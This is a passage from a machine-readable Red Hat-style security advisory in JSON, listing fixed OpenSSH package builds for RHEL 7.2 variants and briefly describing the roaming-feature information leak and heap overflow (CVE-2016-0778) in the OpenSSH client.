"7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "OpenSSH: Client Information leak due to use of roaming connection feature" }, { "acknowledgments": [ { "names": [ "Qualys" ] } ], "cve": "CVE-2016-0778", "cwe": { "id": "CWE-122", "name": "Heap-based Buffer Overflow" }, "discovery_date": "2016-01-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1298033" } ], "notes": [ { "category": "description", "text": "A buffer overflow flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to execute arbitrary code on a successfully authenticated OpenSSH client if that client used certain non-default configuration options.", "title": "Vulnerability description" }, { "category": "summary", "text": "OpenSSH: Client buffer-overflow when using roaming connections", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", 